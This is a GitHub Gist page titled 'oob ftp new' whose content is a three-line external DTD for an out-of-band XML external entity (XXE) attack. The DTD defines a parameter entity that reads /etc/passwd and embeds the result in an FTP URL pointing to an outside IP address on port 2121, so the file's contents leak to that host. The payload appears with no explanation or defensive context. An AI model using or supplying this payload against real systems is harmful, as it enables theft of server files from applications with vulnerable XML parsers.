Last active
May 6, 2018 05:01
-
-
Save pranav1hivarekar/c22e16015baa6d4565bbf1f8d1a50f2d to your computer and use it in GitHub Desktop.
oob ftp new
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://139.59.93.254:2121/%d;'>"> | |
| %c; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment